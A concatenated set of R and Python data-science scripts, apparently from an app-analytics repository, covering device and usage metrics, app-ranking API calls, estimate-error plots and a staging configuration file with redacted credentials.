collected_data = NULL
# loop over selected folders
for (dd in date_range){
# enter day folder
new_folder = paste(folder_name,dd,sep="/")
# detect how many files there are
detect_files = list.files(new_folder,pattern="part")
if(length(detect_files) == 0){
# prompt error missing files
cat(paste("There are no files to read for ",dd,"!!\n",sep=""))
} else {
# read data from files
cat(paste("Processing files for ",dd,"...\n",sep=""))
for(i in 1:length(detect_files)){
collected_data = rbind(collected_data,readFile(paste(new_folder,detect_files[i],sep="/")))
}
}
}
# announce finish of data processing
cat("Finished file processing!\n")
# return data frame
return(collected_data)
}
################################
# compute number of unique #
# devices for a date range #
################################
count_devices_date = function(dataset, start_date, end_date){
# count number of unique devices
mm = length(unique(dataset[dataset$gmt_date >= start_date & dataset$gmt_date <= end_date,'device_id']))
# return value
return(mm)
}
###############################
# compute number of unique #
# devices for a specified app #
###############################
count_devices_app = function(dataset, app_name){
# count number of unique devices
mm = length(unique(dataset[dataset$bundle_id == app_name,'device_id']))
# return value
return(mm)
}
####################################
# compute number of unique devices #
# for a specified app and date #
####################################
count_devices_app_date = function(dataset, app_name, start_date, end_date){
# count number of unique devices
mm = length(unique(dataset[dataset$gmt_date >= start_date & dataset$gmt_date <= end_date & dataset$bundle_id == app_name,'device_id']))
# return value
return(mm)
}
#######################################
# make URL for API requests #
# authentication details using 'httr' #
#######################################
# leaderboards (feed=free/paid/gross)
url_lb = function(country, category, feed, rank, time.frame, start_date, device) {
root = "https://api.appannie.com/v1.1/intelligence/apps/ios/"
# paste to root
u = paste(root, "ranking?countries=", country, "&categories=", category, "&feeds=", feed,
"&ranks=", rank, "&granularity=", time.frame, "&date=", start_date, "&device=", device, sep = "")
return(URLencode(u))
}
# app history (feed=downloads/revenue)
url_app = function(country, feed, device, time.frame, start_date, end_date, app_id) {
root = "https://api.appannie.com/v1.1/intelligence/apps/ios/app/"
# paste to root
u = paste(root, app_id, "/history?countries=", country, "&feeds=", feed, "&device=", device,
"&granularity=", time.frame, "&start_date=", start_date, "&end_date=", end_date, sep = "")
return(URLencode(u))
}
########################################
# Process content from the GET request #
########################################
result = function(ind_req, country='US',category='Overall', feed,rank=10,time.frame='daily',start_date,end_date=start_date,device='iphone',app_id=0000){
# get the url
if(ind_req == 'lb'){
make_url = url_lb(country,category,feed,rank,time.frame,start_date,device)
loop = 1:rank
} else if(ind_req == 'app'){
make_url = url_app(country,feed, device,time.frame, start_date, end_date, app_id)
loop = 1:(1+as.numeric(difftime(end_date,start_date,units="days")))
} else {
stop("Uknown request!")
}
# send the request
make_call = GET(url = make_url, add_headers(Authorization = "bearer <KEY>"))
# read the JSON content
get_data = fromJSON(content(make_call,type="text"),simplify = FALSE)
# process the data
data_out = NULL
if(get_data$code == '200'){
# read app info per rank
for(i in loop){
if(ind_req == 'lb'){
day = c(get_data$end_date, get_data$list[[i]]$product_name, i, get_data$list[[i]]$estimate)
} else {
day = c(get_data$list[[i]]$date, get_data$product_name, get_data$list[[i]]$estimate)
}
data_out = rbind(data_out,day)
}
}
# return result
return(data_out)
}
########################
# Process POST request #
########################
# get app_id from bundle_id
get_app_id = function(bundle_id){
# make the request
make_call = POST(url = "https://api-internal.appannie.com/internal/v1.1/apps/ios/codes2ids",
body=paste("codes=",paste(bundle_id,collapse=","),sep=""), add_headers(Authorization = "bearer <KEY>"))
# extract data
get_data = fromJSON(content(make_call,type="text"),simplify = FALSE)
data_out = NULL
if(get_data$code == '200') {
for(i in 1:length(bundle_id))
if(is.null(get_data$items[[i]]$product_id)){
cat(paste("NULL product_id for bundle_id:",get_data$items[[i]]$code_name,"\n"))
} else {
data_out = rbind(data_out,c(get_data$items[[i]]$code_name,get_data$items[[i]]$product_id))
}
}
return(data_out)
}
###################
# Process LB data #
###################
pull_lb_data = function(rangeDate,feed,rank){
data_out = ldply(rangeDate, function(x) data.frame(result(ind_req='lb',start_date=x,feed=feed,rank=rank),stringsAsFactors=F,row.names=NULL))
colnames(data_out) = c("date","app_name","rank","estimate")
data_out$estimate = as.numeric(data_out$estimate)
return(data_out)
}
###################
# Process app ids #
###################
pull_app_id = function(bundle_id){
data_out = data.frame(get_app_id(bundle_id),stringsAsFactors=F,row.names=NULL)
colnames(data_out) = c("bundle_id","app_id")
data_out$app_id = as.numeric(data_out$app_id)
return(data_out)
}
###################
# Process app ids #
###################
pull_app_data = function(start_date,end_date,feed,app_id){
ll = length(app_id)
data_out = ldply(1:ll, function(x) data.frame(result(ind_req='app',start_date=start_date,end_date=end_date,feed=feed,app_id=app_id[x]),stringsAsFactors=F,row.names=NULL))
colnames(data_out) = c("date","app_name","estimate")
data_out$estimate = as.numeric(data_out$estimate)
return(data_out)
}
###################################
# Rescale from [min,max] to [a,b] #
###################################
rescale_value = function(x,a,b){
new_x = (b-a) * (x - min(x,na.rm=T)) / (max(x,na.rm=T) - min(x,na.rm=T)) + a
return(new_x)
}
######################
# K-means clustering #
######################
do_clustering = function(dataset){
# optimal number of clusters
pamk.best = pamk(dataset)
cat("number of clusters estimated:", pamk.best$nc, "\n")
# distribute points into clusters
into_cluster = pam(dataset+rnorm(nrow(dataset),1e-19), pamk.best$nc)
# visualize the clusters
plot(into_cluster, main="Cluster visualization", labels=5, lines=0, xaxt="n", yaxt="n",bty="n", xlab="",ylab="")
cluster_apps = list()
# get apps within cluster
for(i in 1:pamk.best$nc){
# select all devices within cluster
cluster_dev = dataset[which(into_cluster$clustering==i),]
# used apps
counts = which(apply(cluster_dev,2,sum) > 0)
cluster_apps[[i]] = unique_apps[counts]
}
return(cluster_apps)
}
####################################
# Domain percentage in web traffic #
####################################
get_browser_pp = function(browser,dataset){
# initialize
result = NULL
# process data
for(i in 1:length(browser)){
select_rows = which(str_detect(dataset$bundle_id,fixed(browser[i])) * str_detect(dataset$URL,fixed("http://")) == TRUE)
browser_url = dataset[select_rows,'URL']
ca_browser = which(str_detect(browser_url,fixed(".ca/"))==TRUE)
com_browser = which(str_detect(browser_url,fixed(".com/"))==TRUE)
net_browser = which(str_detect(browser_url,fixed(".net/"))==TRUE)
org_browser = which(str_detect(browser_url,fixed(".org/"))==TRUE)
pp_ca = round(length(ca_browser) / length(browser_url),2)
pp_com = round(length(com_browser) / length(browser_url),2)
pp_net = round(length(net_browser) / length(browser_url),2)
pp_org = round(length(org_browser) / length(browser_url),2)
result = rbind(result, c(pp_ca,pp_com,pp_net,pp_org))
}
colnames(result) = c('CA','COM','NET','ORG')
rownames(result) = browser
# return result
return(result)
}
#########################
# Page views percentage #
#########################
get_page_views = function(browser,dataset,rangeDate){
# initialize
count = NULL
# process data
for(i in 1:length(browser)){
ind = which(str_detect(unique_apps,browser[i]))
nr_pages = sapply(1:length(rangeDate), function(j) length(which(dataset$bundle_id == unique_apps[ind] & dataset$gmt_date == rangeDate[j])))
count = rbind(count,nr_pages)
}
total = apply(count,2,sum)
result = t(sapply(1:length(browser), function(i) count[i,]/total))
rownames(result) = browser
colnames(result) = rangeDate
# rreturn results
return(result)
}
############################
# Plot sample size results #
############################
plot_app = function(app_to_plot,ind_ff=1,bar=T){
# define plotting area
nr_plots = ceiling(length(response_rate)/2)
par(mfrow=c(nr_plots,length(response_rate)-nr_plots),las=1,mar=c(4,4.7,2,0),oma=c(0,0,0,0))
col_all=rainbow(length(zz_conf))
# select data to plot
for(rr in response_rate){
ind_rr = which(response_rate == rr)
# select from proportion or mean estimation for barchart
if(bar){
par(mar=c(4,4,2,0))
if(ind_ff == 1){
data_to_plot = t(sample_size[app_to_plot,ind_rr,,])
max_val = apply(sample_size[app_to_plot,ind_rr,,],2,max)
} else if(ind_ff == 2){
data_to_plot = t(sample_size_prop[app_to_plot,ind_rr,,])
max_val = apply(sample_size_prop[app_to_plot,ind_rr,,],2,max)
} else {
cat("Unknown indicator data selection\n")
}
# plot the data
barplot(data_to_plot,col=col_all,main=paste("VPN usage: ",100*rr,"%",sep=""),beside=T,axes=F,xlab="Precision margin to true DAU")
axis(2,at = c(0,max_val),labels = formatC(c(0,max_val),format="d",big.mark=","))
} else {
data_to_plot = t(sample_size_prop_perc[app_to_plot,ind_rr,,])
max_val = apply(sample_size_prop_perc[app_to_plot,ind_rr,,],2,max)
ylim = c(log(min(data_to_plot)),log(max(data_to_plot)))
plot(log(sort(data_to_plot[1,])), type="b", lwd = 2, col=col_all[1], ylim=ylim,
main=paste("VPN usage: ",100*rr,"%",sep=""), axes=F,
xlab=expression(paste("Precision margin (fraction of sample ",italic(p),")",sep="")),ylab="")
for(i in 2:length(zz_conf)) lines(log(sort(data_to_plot[i,])), type = "b", lwd = 2, col=col_all[i])
axis(1, at = seq(1,all_marg_error), labels = paste(rev(marg_error_prop * 100),"%",sep=""))
#ylab = seq(ylim[1], ylim[2], length.out = all_marg_error - 1)
ylab = c(ylim[1],log(rev(data_to_plot[2,])),ylim[2])
axis(2, at = ylab, labels = formatC(c(min(data_to_plot),rev(data_to_plot[2,]),max(data_to_plot)),format="d",big.mark=","))
#axis(4, at = log(max_val), labels = formatC(max_val,format="d",big.mark=","))
five_perc_ind = which(marg_error_prop == 0.05) - 1
segments(x0=all_marg_error - five_perc_ind, y0=log(data_to_plot[1,all_marg_error]), y1=ylab[all_marg_error - five_perc_ind + 1], lty=3,lwd=2)
segments(x0=1, y0=ylab[all_marg_error - five_perc_ind+1], x1=all_marg_error - five_perc_ind, lty=3,lwd=2)
}
}
# add extra plot for legend and other information
nr_empty_plots = nr_plots * (length(response_rate) - nr_plots) - length(response_rate)
for(i in 1:nr_empty_plots) plot(1, type="n", axes=F, xlab="", ylab="")
title(sel_bundle_id[app_to_plot],line = -6, cex=1.5)
if(ind_ff == 2 || bar == F) textxy(c(0.8,0.88),c(0.8,0.82), labs = c(expression(paste(italic(p)," = ")),paste(round(dau_app_perc[app_to_plot]*100),"%",sep="")),cex=1.25)
legend("bottomright",leg=paste(100*conf_int,"%",sep=""),col=col_all,cex=1.25,pch=15,bty="n")
par(mfrow=c(1,1))
}
###########################################################
# compute wMAPE (weighted mean absolute percentage error) #
###########################################################
wmape = function(y,yhat){
ll = length(y)
mm = sum(abs(yhat-y))/sum(y)
return(mm)
}
##########################################
# compute RMSD (root mean squared error) #
##########################################
rmsd = function(y,yhat){
ll = length(y)
mm = sqrt(sum((yhat-y)^2)/ll)
return(mm)
}
################################
# Compute duration + frequency #
################################
compute_metric = function(dataset, app_name, start_date, end_date, metric=c("duration","frequency","AU"), include_zero=T, per_day=F){
# select info from data set
if(include_zero){
sel_dataset = dataset[dataset$bundle_id == app_name & dataset$gmt_date >= start_date & dataset$gmt_date <= end_date,]
} else{
sel_dataset = dataset[dataset$bundle_id == app_name & dataset$gmt_date >= start_date & dataset$gmt_date <= end_date & dataset$session_length > 0,]
}
# count number of active users
sel_device = unique(sel_dataset$device_id)
result = NULL
# calculate metric
for(i in 1:length(metric)){
# identify metric
if(metric[i] == "duration"){
# compute metric
result = c(result, round(mean(as.numeric(sel_dataset$session_length) / 60),3))
}
if (metric[i] == "frequency"){
# number of sessions
nr_sessions = nrow(sel_dataset)
# number of devices
nr_devices = length(sel_device)
# compute metric
if(per_day){
result = c(result, round(nr_sessions / nr_devices / as.numeric(difftime(end_date,start_date,"days")+1),3))
} else {
result = c(result, round(nr_sessions / nr_devices,3))
}
}
if(metric[i] == "AU"){
result = c(result, length(sel_device))
}
}
# return result
return(result)
}
###########################
# Calculate sample size #
##########################
calculate_sample = function(apps,device_type,response_rate,marg_error,conf_int,design,perc=T){
# initialize
sample_size = list()
nr_apps = length(apps)
all_marg_error = length(marg_error)
zz_conf = round(sapply((1+conf_int)/2,qnorm),3)
D = design
# compute
for(dev in device_type){
# initialize per device type
sample_size[[dev]] = array(NA, dim=c(nr_apps,length(response_rate),all_marg_error,length(zz_conf)),dimnames=list(unique_apps,response_rate,marg_error_prop,conf_int))
# compute for all apps
for(i in 1:nr_apps){
# compute for all levels of response rate
for(rr in response_rate){
ind_rr = which(response_rate == rr)
# compute for all margins of error
for(j in 1:all_marg_error){
# compute for all cofidence levels
for(zz in zz_conf){
ind_zz = which(zz_conf == zz)
ind_dev = which(dev_type == dev)
error_prop = ifelse(perc, marg_error[j] * sample_average_au[i,dev], marg_error[j])
var = sample_average_au[i,ind_dev] * (1 - sample_average_au[i,ind_dev])
# sample size formula
sample_size[[dev]][i,ind_rr,j,ind_zz] = ceiling((zz / error_prop)^2 * var * D / rr)
}
}
}
}
}
# return result
return(sample_size)
}
#####################################
# select active devices for date dd #
#####################################
active_devices_date = function(dd){
devices_prior = unique(subset_connection_data[subset_connection_data$gmt_start_date < dd & subset_connection_data$gmt_start_date >= dd-7,'device_id'])
devices_after = unique(subset_connection_data[subset_connection_data$gmt_start_date > dd & subset_connection_data$gmt_start_date <= dd+3,'device_id'])
devices_paused = unique(subset_pause_data[subset_pause_data$gmt_pause_date == dd, 'device_id'])
devices_active = intersect(devices_prior,devices_after)
devices_final = setdiff(devices_active,devices_paused)
return(devices_final)
}
<file_sep>/ranking_change/concat.py
'''
Created on Aug 16, 2013
@author: perezrafael
'''
import pandas as pd
import os
def main():
path = '/Users/perezrafael/appannie/data_science/ranking_change/data'
dfs = []
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('_rank_change_alerts.csv'):
dfs.append(pd.read_csv(os.sep.join([dirpath, filename])))
dfs = pd.concat(dfs)
dfs.to_csv('data/all_alerts.csv', index=False)
if __name__ == '__main__':
main()<file_sep>/plotting/plot_errors.py
import datetime
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import config
import psycopg2
import numpy as np
import os
if not os.path.exists('plots/80_20'):
os.makedirs('plots/80_20')
CONN = None
def get_connection(db_name):
global CONN
if CONN is None:
CONN = psycopg2.connect('dbname=%s user=aa host=10.38.48.144'%db_name)
return CONN
def read_actuals(date, store_id, value_type, table_name):
conn = get_connection('aa_staging')
cur = conn.cursor()
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
print cur.mogrify(sql, params)
cur.execute(sql, params)
for app_id, value in cur:
yield {'app_id': app_id, value_type: value}
cur.close()
def read_weekly_estimates(end_date, store_id):
conn = get_connection('aa_est_weekly')
cur = conn.cursor()
sql = 'SELECT app_id, category_id, iphone_free, iphone_paid, iphone_revenue, ipad_free, ipad_paid, ipad_revenue FROM sbe_est_app WHERE end_date = %s AND store_id = %s'
params = (end_date, store_id)
print cur.mogrify(sql, params)
cur.execute(sql, params)
for app_id, category_id, iphone_free, iphone_paid, iphone_revenue, ipad_free, ipad_paid, ipad_revenue in cur:
yield {'app_id': app_id,
'category_id': category_id,
'iphone_free' : iphone_free,
'iphone_paid': iphone_paid,
'iphone_revenue': iphone_revenue,
'ipad_free': ipad_free,
'ipad_paid': ipad_paid,
'ipad_revenue': ipad_revenue}
cur.close()
def make_date_range(start_date_inclusive, end_date_inclusive):
assert start_date_inclusive <= end_date_inclusive
def create():
d = start_date_inclusive
while d <= end_date_inclusive:
yield d
d = d + datetime.timedelta(1)
return tuple(create())
def preprocess_metadata(df):
df['Category'] = df['category_id'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
del df['category_id']
df.rename(columns={'iphone_revenue':'iphone_grossing',
'ipad_revenue': 'ipad_grossing'},
inplace=True)
return df
FILTER_ACTUALS = (
('sales', 'revenue'),
('downloads', 'units'),
)
def get_errors(df):
df['downloads'] = df['iphone_free'] + df['iphone_paid'] + df['ipad_free'] + df['ipad_paid']
df['sales'] = df['iphone_grossing'] + df['ipad_grossing']
df['downloads_rel_error'] = (df['downloads'] - df['units']).abs()*1.0/df['units']
df['sales_rel_error'] = (df['sales'] - df['revenue']).abs()*1.0/df['revenue']
return df
def plot_80_20(df, type, unit, country, category):
########### Plot 80-20 curves ################
error_column = '%s_rel_error'%type
df = df.dropna(axis=0, subset=[error_column])
df = df.drop_duplicates(cols=['app_id'], take_last=True)
fig = plt.figure()
df = df.sort(unit, ascending=False)
df = df[:200]
print df
print df[:10]
ax = fig.add_subplot(111)
df = df.sort(error_column, ascending=True)
p1, = ax.plot(df[error_column], (np.arange(df.shape[0])*1.0/df.shape[0])*100.0, 'b-')
#ax.legend(loc='best')
title = '80-20_%s_%s_%s'%(country, category, type)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/80_20/%s.png'%title)
#fig.close()
def plot_country(store_id_str = '143441'):
global CONN
dfs = []
#store_id_str = '143441'
country = config.IOS_STORES_DICT[int(store_id_str)]
DATES = make_date_range(datetime.date(2013, 8, 25), datetime.date(2013, 8, 31))
for date in DATES:
for (table_name, value_type) in FILTER_ACTUALS:
actuals_df = pd.DataFrame(list(read_actuals(date, int(store_id_str), value_type, table_name)))
if not len(actuals_df):
print 'no actuals for', date, store_id_str, value_type
continue
dfs.append(actuals_df)
end_date = date
actuals_df = pd.concat(dfs)
CONN.close()
CONN = None
actuals_df = actuals_df.groupby('app_id').sum().reset_index()
estimates_df = pd.DataFrame(list(read_weekly_estimates(end_date, int(store_id_str))))
CONN.close()
CONN = None
df = pd.merge(actuals_df, estimates_df, on=['app_id'], how='inner')
df = preprocess_metadata(df)
df = df.fillna(0.0)
df = get_errors(df)
#del df['Category']
df = df.drop_duplicates()
print df[:10]
for (type, unit) in FILTER_ACTUALS:
plot_80_20(df, type, unit, country, 'all')
for n, g in df.groupby('Category'):
plot_80_20(g, type, unit, country, n)
def main():
stores = ['143441', '143444', '143462', '143466', '143469' ]
for store in stores:
plot_country(store)
if __name__ == '__main__':
main()<file_sep>/evaluation/py/get_median_rank.py
"""
Concat the median rank (across date) in different categories and feeds.
This information is used in evaluation
"""
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
apps_median = _get_median_rank(df)
apps_median.to_csv(os.path.join(output_dir, f), index=False)
def _get_median_rank(df):
grouped = df.groupby(['app_id', 'category_id', 'feed_id'])['rank'].median()
agg = grouped.reset_index()
agg['median_rank'] = map(str, agg['rank'])
agg = agg.drop(['category_id', 'feed_id'], axis=1)
median_ranks = agg.groupby('app_id').aggregate({'median_rank': lambda x: ','.join(x)})
return median_ranks.reset_index()
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_scripts/workflow/conf/settings.py
TEST = False
ENV = 'staging'
OPS_SERVER_HOST = 'stg-ops'
HDFS_MNT_PREFIX = '/mnt/hdfs'
HDFS_ROOT_PATH = '/user/aardvark'
HBASE_THRIFT_HOST = 'localhost'
STREAMING_JAR = '/home/hadoop/contrib/streaming/hadoop-streaming.jar'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
QUEUES = ['workflow']
EMR_KEY_PAIR_FILE = '/home/aardvark/id_rsa_emr.pem'
PG_DB_USER = 'awsuser'
PG_DB_PASSWD = '<PASSWORD>'
PG_DB_HOST = 'stg-rdb-1.cnrzhjm9iivh.us-east-1.rds.amazonaws.com'
PG_DB_PORT = 5432
PG_DB_NAME_A = 'stg_rdb_1'
PG_DB_NAME_B = 'report_ui'
APPANNIE_API_KEY = '<KEY>'
VPN_RADIUS_DB_HOST = 'radius-staging.cnrzhjm9iivh.us-east-1.rds.amazonaws.com'
VPN_RADIUS_DB_PORT = 5432
VPN_RADIUS_DB_USER = 'radius'
VPN_RADIUS_DB_PWD = '<PASSWORD>'
VPN_RADIUS_DB_USERINFO = 'radius'
WORKFLOW_LOG_PATH = '/home/aardvark/log'
API_HOST = 'https://report-stg.smart-sense.org'
API_AUTH = ('a8k', '<PASSWORD>')
AWS_ACCESS_KEY_ID = '<KEY>'
AWS_SECRET_ACCESS_KEY = '<KEY>'
S3_BIG_UPLOAD_BUCKET = 'aardvark-stg-big-upload'
ZK_HOST = 'stg-nn-1,stg-mgt,stg-nn-2'
ZK_PORT = '2181'
DPI_RESULT_S3_BUCKET = 'aardvark-stg-ds-sample'
DPI_RESULT_S3_ACCESS_KEY = '<KEY>'
DPI_RESULT_S3_SECRET_KEY = '<KEY>'
DPI_RESULT_S3_HOST = 's3.amazonaws.com'
DATA_S3_BUCKET='aardvark-stg-data'
<file_sep>/google-analytics/constant/constant.py
# CONSTANT for 2015 Q1
# There is updated version which changes Japan and Worldwide device population
total_users = {'Android Mobile': {'US':105539388, 'GB':16626811, 'JP':29831382},
'iPhone': {'US':96551128, 'GB':15584322, 'JP':24991269},
'Android Tablet': {'US':41354977, 'GB':5655112, 'JP':9860209},
'iPad': {'US':36956810, 'GB':7289178, 'JP':8632028}
}
<file_sep>/sbe_benchmark/analyze_estimates_ios.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import config
import datetime
import sys
import itertools
import bz2
import psycopg2
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 1)
PLATFORM = 'ios'
PERIOD = '2013-07'
WEBUI_DAILY = '/Users/perezrafael/appannie/data/estimates_daily-2013-07'
MONTHLY = '/Users/perezrafael/appannie/data/estimates_monthly_2013-07'
DAILY_7_DAYS = '/Users/perezrafael/appannie/data/estimates_7_days'
DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=nile'
DB_EVENTS_STRING = 'dbname=aa user=aa host=nile'
#DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=10.38.48.144 port=5432'
#DB_EVENTS_STRING = 'dbname=aa user=aa host=10.38.48.134 port=6432'
COMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
#COMPRESSED_RANKING_FILES_PATH = '/mnt/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(COMPRESSED_RANKING_FILES_PATH):
print 'Expecting compressed ranking files in directory %s' % COMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
CONN = None
def get_connection(conn_string):
global CONN
if CONN is None:
CONN = psycopg2.connect(conn_string)
return CONN
ipad_feeds = {'100': '1',
'101': '0',
'102': '2'}
reverse_ipad_feeds = {'1': '100',
'0': '101',
'2': '102'}
ALL_FEEDS = {'0': '0',
'1': '1',
'2': '2',
'100': '1',
'101': '0',
'102': '2'
}
ESTIMATES_FEED_ID = {1000: '0',
1001: '1',
1002: '2'}
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql.bz2')
filename_date_str = filename[len('ranking_'):-len('.sql.bz2')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_feed_str_filter = frozenset(map(str, config.IOS_MARKETS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.IOS_CATEGORIES_DICT.keys()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
#f = open(path, 'r' )
f = bz2.BZ2File(path, 'r')
iphone_dfs = []
ipad_dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if ranking_store_str not in store_ids:
continue
if ranking_feed_str not in ranking_feed_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
store_id = ranking_store_str
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app_id', 'index':'rank'}, inplace=True)
df['rank'] += 1
df['date'] = ranking_date_str
df['store_id'] = store_id
df['category_id'] = category_id
if int(feed_id) < 100:
#df.rename(columns={'rank': 'iphone_rank'}, inplace=True)
iphone_dfs.append(df)
df['feed_id'] = feed_id
else:
#df.rename(columns={'rank': 'ipad_rank'}, inplace=True)
ipad_dfs.append(df)
df['feed_id'] = feed_id
f.close()
iphone_dfs = pd.concat(iphone_dfs)
ipad_dfs = pd.concat(ipad_dfs)
iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
#print iphone_dfs
#print ipad_dfs
#return iphone_dfs.merge(ipad_dfs, on=['app_id', 'date', 'store_id', 'category_id', 'feed_id'], how='outer')
return pd.concat([iphone_dfs, ipad_dfs])
def read_actuals(date, store_id, value_type, table_name, ranked_apps=None):
conn = get_connection(DB_ACTUALS_STRING)
cur = conn.cursor()
if ranked_apps is None:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
else:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s AND app_id = ANY(%%s)' % (value_type, table_name)
params = (date, store_id, ranked_apps)
cur.execute(sql, params)
#print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'app_id': app_id, table_name: value}
cur.close()
def get_actuals(store_ids, DATES, table_name, value_type, ranked_apps=None):
result = []
for store_id, single_date in itertools.product(store_ids, DATES):
df = pd.DataFrame(list(read_actuals(single_date, int(store_id), value_type, table_name, ranked_apps)))
df['date'] = single_date.strftime('%Y-%m-%d')
df['store_id'] = store_id
result.append(df)
result = pd.concat(result)
result[['app_id', 'date', 'store_id']] = result[['app_id', 'date', 'store_id']].astype(str)
return result
def load_daily_estimates(DATES, dir, store_id, model_name):
estimates_df = []
for single_date in DATES:
file = '%s/estimates_daily_%s_%s_%s.csv.bz2'%(dir, PLATFORM, store_id, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = pd.read_csv(file, compression='bz2')
estimates_df.append(df)
estimates_df = pd.concat(estimates_df)
estimates_df['feed_id'] = estimates_df['feed_id'].apply(lambda x: ESTIMATES_FEED_ID[x])
estimates_df.rename(columns={'estimate': 'estimate_%s'%model_name}, inplace=True)
estimates_df[['app_id', 'date', 'store_id']] = estimates_df[['app_id', 'date', 'store_id']].astype(str)
return estimates_df
def load_ranks(DATES, path, store_id, category_ids):
ranks_df = []
for single_date in DATES:
file = '%s/ranking_%s.sql.bz2'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, [store_id], category_ids)
ranks_df.append(df)
ranks_df = pd.concat(ranks_df)
ranks_df['feed_id'] = ranks_df['feed_id'].apply(lambda x: ALL_FEEDS[x])
return ranks_df
def get_errors(df, model_names):
for model_name in model_names:
df['abs_error_%s'%model_name] = (df['actual'] - df['estimate_%s'%model_name]).abs()
df['rel_error_%s'%model_name] = df['abs_error_%s'%model_name] / df['actual']
return df
def plot_8020(df, model_names, groupby):
df = df.dropna(subset=['actual'])
df2 = []
for n, g in df.groupby(groupby):
g = g.sort('actual', ascending=False)
g['range'] = '201 to end'
g['range'][:200] = '21 to 200'
g['range'][:20] = '11 to 20'
g['range'][:10] = '1 to 10'
df2.append(g)
df = pd.concat(df2)
del df2
groupby.append('range')
for n, g in df.groupby(groupby):
fig = plt.figure()
ax = fig.add_subplot(111)
for model_name in model_names:
g.sort('rel_error_%s'%model_name, ascending=True, inplace=True)
t_under_20 = int((float(g[g['rel_error_%s'%model_name]<=0.2].shape[0])/float(g.shape[0]))*100.0)
ax.plot(g['rel_error_%s'%model_name], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, '-', label='%s %% - %s'%(t_under_20, model_name))
print n
ax.legend(loc=4)
title = '8020 %s %s %s'%(PLATFORM, PERIOD, str(n))
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('data/plots/%s.png'%title)
plt.close()
def make_human_readable(df):
if PLATFORM=='ios':
df['store_id'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[int(x)])
#df['feed_id'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[int(x)])
df['category_id'] = df['category_id'].apply(lambda x: config.IOS_CATEGORIES_DICT[int(x)])
return df
def generate_summary(df, groupby, model_names):
df = df.dropna(subset=['actual'])
df2 = []
for n, g in df.groupby(groupby):
g = g.sort('actual', ascending=False)
g['range'] = '201 to end'
g['range'][:200] = '21 to 200'
g['range'][:20] = '11 to 20'
g['range'][:10] = '1 to 10'
df2.append(g)
df = pd.concat(df2)
del df2
groupby.append('range')
summary = []
for n, g in df.groupby(groupby):
d = g.describe()
s = pd.Series()
s.name = '%_apps_under_20%_error'
d = d.append(s)
s.name = 'best_case'
d = d.append(s)
max = 0
min_error = 100
for model_name in model_names:
t_under_20 = float(g[g['rel_error_%s'%model_name]<=0.2].shape[0])/float(g.shape[0])
d['rel_error_%s'%model_name]['%_apps_under_20%_error'] = t_under_20
if t_under_20 > max:
d.loc['best_case'] = 0
d['rel_error_%s'%model_name]['best_case'] = 1
max = t_under_20
min_error = d['rel_error_%s'%model_name]['mean']
elif t_under_20 == max:
if d['rel_error_%s'%model_name]['mean'] < min_error:
d.loc['best_case'] = 0
d['rel_error_%s'%model_name]['best_case'] = 1
min_error = d['rel_error_%s'%model_name]['mean']
i = 0
for gb in groupby:
d[gb] = n[i]
i += 1
d['platform'] = PLATFORM
d['period'] = PERIOD
summary.append(d)
summary = pd.concat(summary)
stores = str(summary['store_id'].drop_duplicates().values)
summary.loc[['best_case']].to_csv('data/summary_best-case-only_%s_%s_%s.csv'%(PLATFORM, PERIOD, stores))
summary.to_csv('data/summary_full_%s_%s_%s.csv'%(PLATFORM, PERIOD, stores))
return summary
def process_single_country(store_id, DATES):
global CONN
